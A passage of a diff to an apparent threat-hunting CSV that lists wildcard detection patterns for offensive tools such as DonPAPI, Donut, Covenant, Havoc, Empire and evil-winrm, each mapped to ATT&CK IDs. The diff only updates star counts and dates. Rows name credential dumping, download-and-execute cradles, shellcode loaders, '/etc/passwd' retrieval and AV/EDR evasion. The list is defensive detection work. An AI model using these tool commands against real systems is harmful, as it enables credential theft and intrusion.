T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*donut -f *.dll -c * -m RunProcess*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*donut -f c2.dll*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*donut* 
\DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
-"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut* \DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
 "*DonutLoader.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
-"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
-"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
 "*donut-shellcode*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
 "*dos-over-tor*","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. 
Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","10","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z"
 "*dothatlsassthing*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
 "*dotnet ./Server.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
-"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*dotnet Inveigh.dll*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z"
 "*dotnet ParseMalleable/ParseMalleable.dll*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
-"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*DotNet2JSImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
-"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*DoubleAgent.sln*","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1200","436","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z"
 "*douknowwhoami?d*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z"
-"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
 "*download /etc/passwd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
 "*Download:Cradle.js*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
 "*Download_Cradles.*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
-"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security 
penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
